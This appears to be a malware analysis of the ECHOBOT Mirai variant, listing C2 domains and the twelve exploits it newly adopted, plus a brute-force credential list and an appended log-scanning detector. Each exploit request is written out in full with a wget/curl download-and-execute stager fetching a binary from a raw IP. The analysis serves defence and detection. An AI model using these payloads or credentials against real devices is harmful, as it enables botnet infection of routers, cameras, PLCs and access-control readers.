
A Mirai variant circulating under the name ECHOBOT surfaced on 6th August 2019, containing a total of 57 unique exploits. While the majority of those exploits have already been seen in the wild, a dozen are new additions in these particular samples and represent the first known instance of their use by a piece of malware. This conforms to the trend seen with Mirai variants, and even more so with ECHOBOT, wherein authors test the effectiveness of public exploits in terms of gains in bot count: exploits that infect a greater number of devices are retained or reused in future variants, whereas the less effective ones are retired or replaced with other exploits.

Most notably, the new set of exploits includes two targeting biometric iris readers and one targeting a Beckhoff PLC. Also included is an exploit against certain Citrix SD-WAN appliances, incorporated less than a month after the public release of the vulnerability and exploit. The remaining targets are IP cameras, routers/gateways and, for the most part, server management/monitoring tools.

IOCs and distinguishing features for these samples are shared below. Previous research on the same variant can be found here.

Sample hashes

C2s

akuma[.]pw:17
akumaiotsolutions[.]pw:777

URLs


Exploits

New exploits in these samples seen for the first time in the wild

Vulnerability: CVE-2019-12989, CVE-2019-12991
Affected devices: Citrix SD-WAN Appliances (tested on 10.2.2)
Exploit format:

    POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % '99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
    'SSL_CLIENT_VERIFY' : 'SUCCESS'
    get_package_fil:
    site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active

    User-Agent: Hello-World
    Connection: keep-alive

Vulnerability: EyeLock nano NXT Remote Code Execution
Affected devices: EyeLock NXT Biometric Iris Readers with firmware version 3.5
Exploit format:

    GET /scripts/rpc.php?action=updatetime&timeserver=||cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1

Vulnerability: Iris ID IrisAccess ICU Cross-Site Scripting
Affected devices: Iris ID IrisAccess ICU 7000-2
Exploit format:

    POST /html/SetSmarcardSettings.php HTTP/1.1
    Content-Length: 11660
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    X-Powered-By: PHP/5.5.13
    User-Agent: joxypoxy/7.2.6

    HidChannelID=2&HidcmbBook=0&cmbBook=0|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08

Vulnerability: CVE-2015-4051
Affected devices: Beckhoff CX9020 PLCs
Exploit format:

    POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1
    User-Agent: Hello-World
    Host: 192.168.0.1:5120
    Content-type: text/xml; charset=utf-8
    SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write
    M-SEARCH * HTTP/1.1
    HOST: 239.255.255.250:1900
    MAN: ssdp:discover',0Dh,0Ah
    MX: 3
    ST: upnp:rootdevice

    <?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>

Vulnerability: Xfinity Gateway Remote Code Execution
Affected devices: Xfinity Gateways
Exploit format:

    POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
    Host: 10.0.0.1:80
    User-Agent:
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://10.0.0.1/network_diagnostic_tools.php
    Content-Length: 91
    Cookie: PHPSESSID=; auth=
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: keep-alive

    test_connectivity=true&destination_address=www.comcast.net || cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4

Vulnerability: Beward N100 Authenticated Remote Code Execution
Affected devices: Beward N100 IP Cameras
Exploit format:

    GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.2.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
    Authorization: Basic YWRtaW46YWRtaW4=
    Server: Boa/0.94.14rc21
    Accept-Ranges: bytes
    Connection: close
    Content-type: text/plain

Vulnerability: Fritz!Box Webcm Command Injection. This vulnerability was first briefly seen exploited by the Muhstik botnet in January 2018; this is the first instance of exploitation by a Mirai descendant.
Affected devices: Several versions of Fritz!Box devices
Exploit format:

    GET /cgi-bin/webcm HTTP/1.1

    var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard

Vulnerability: FLIR Thermal Camera Command Injection
Affected devices: Certain FC-Series S and PT-Series models of FLIR Cameras
Exploit format:

    POST /page/maintenance/lanSettings/dns HTTP/1.1
    Host: 192.168.0.1:80
    Content-Length: 64
    Accept: */*
    Origin: http://192.168.0.1
    X-Requested-With: XMLHttpRequest
    User-Agent: Testingus/1.0
    Content-Type: application/x-www-form-urlencoded
    Referer: http://192.168.0.1/maintenance
    Accept-Language: en-US,en;q=0.8,mk;q=0.6
    Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
    Connection: close

    dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60

Vulnerability: Sapido RB-1732 Remote Command Execution
Affected devices: Sapido RB-1732 Wireless Routers
Exploit format:

    GET /goform/formSysCmd HTTP/1.1
    ('<textarea rows="15" name="msg" cols="80" wrap="virtual">')
    ('</textarea>')

    {'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}

Vulnerability: CVE-2016-0752
Affected devices: Ruby on Rails multiple versions
Exploit format:

    POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1
    Content-Type: multipart/form-data; boundary=
    <%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%>

Vulnerability: CVE-2014-3914
Affected devices: Rocket ServerGraph 1.2 (tested on Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu 12.04 64 bits)
Exploit format:

    POST /SGPAdmin/fileRequest HTTP/1.1
    &invoker=&title=&params=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query=

Vulnerability: CVE-2015-2208
Affected devices: PHPMoAdmin installations
Exploit format:

    POST /moadmin/moadmin.php HTTP/1.1
    Host: 192.168.0.1:80
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34

    object=1;system(wget http://185.164.72.155/richard; curl -O http:#//185.164.72.155/richard; chmod +x richard; ./richard);exit
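Every request in the table carries the same download-and-execute stager (wget/curl from a raw IP, chmod +x, run), which is a better detection handle than any single endpoint. The following Python detector is an added example, not part of the original write-up: it URL-decodes a request's path and body, matches that stager pattern, and labels the hit with the product whose endpoint was abused. The product labels and the sample requests are constructed here from the formats above, not captured traffic.

```python
import re
from urllib.parse import unquote

# Endpoints abused by the exploits in the table above, keyed by request path.
TARGETED_PATHS = {
    "/sdwan/nitro/v1/config/get_package_file": "Citrix SD-WAN (CVE-2019-12989/12991)",
    "/scripts/rpc.php": "EyeLock nano NXT",
    "/html/SetSmarcardSettings.php": "Iris ID IrisAccess ICU",
    "/upnpisapi": "Beckhoff CX9020 (CVE-2015-4051)",
    "/actionHandler/ajax_network_diagnostic_tools.php": "Xfinity Gateway",
    "/cgi-bin/operator/servetest": "Beward N100",
    "/cgi-bin/webcm": "Fritz!Box webcm",
    "/page/maintenance/lanSettings/dns": "FLIR camera",
    "/goform/formSysCmd": "Sapido RB-1732",
    "/SGPAdmin/fileRequest": "Rocket ServerGraph (CVE-2014-3914)",
    "/moadmin/moadmin.php": "PHPMoAdmin (CVE-2015-2208)",
}

# The stager shared by every row: fetch a file from a raw IP with wget or
# curl -O, chmod +x the same file name, then run it. The '+' is optional
# because a form decoder may already have turned it into a space.
STAGER_RE = re.compile(
    r"(?:wget|curl\s+-O)\s+http:[#/]*(\d{1,3}(?:\.\d{1,3}){3})/(\w+)"
    r".*?chmod\s+\+?x\s+(?:/tmp/)?\2\b",
    re.IGNORECASE | re.DOTALL,
)

def classify(target, body):
    """Return (product, payload host, payload file) when the request carries
    the stager, else None. Decodes %xx once and keeps '+' literal."""
    m = STAGER_RE.search(unquote(target) + "\n" + unquote(body))
    if not m:
        return None
    path = target.split("?", 1)[0]
    return TARGETED_PATHS.get(path, "unknown endpoint"), m.group(1), m.group(2)

def scan(requests):
    """Return (path, product, host, file) for every (target, body) with a hit."""
    return [(t.split("?", 1)[0],) + r for t, b in requests if (r := classify(t, b))]

# Constructed sample requests modelled on the formats above (not captured
# traffic); the last two are benign uses of the same endpoints.
SAMPLES = [
    ("/scripts/rpc.php?action=updatetime&timeserver=||cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard", ""),
    ("/page/maintenance/lanSettings/dns", "dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60"),
    ("/moadmin/moadmin.php", "object=1;system(wget http://185.164.72.155/richard; curl -O http:#//185.164.72.155/richard; chmod +x richard; ./richard);exit"),
    ("/scripts/rpc.php?action=updatetime&timeserver=pool.ntp.org", ""),
    ("/page/maintenance/lanSettings/dns", "dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4"),
]
```

scan(SAMPLES) returns the three stager-carrying requests with their product labels and drops the two benign ones; feed it (path, body) pairs from a web server or proxy log to apply it to real traffic.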

Related AutoFocus Tags

Other exploits in the samples (along with function names in unstripped binaries):

Default Credentials

The following are unusual default credentials for brute forcing that I haven't previously seen used by a Mirai variant:

admin/firetide
mysweex/mysweex
hame/
admin/hsparouter
root/aaaaaa
211cmw91765/
cable/
admin/arrowpoint
admin/airlive
public/
admin/urchin
AdvWebadmin/advcomm500349
admin/readwrite
status/readonly
root/skyboxview
rainbow/
admin/allot
gonzo/
admin/publish
root/tooridu
root/trendmsa1.0
admin/AlpheusDigital1010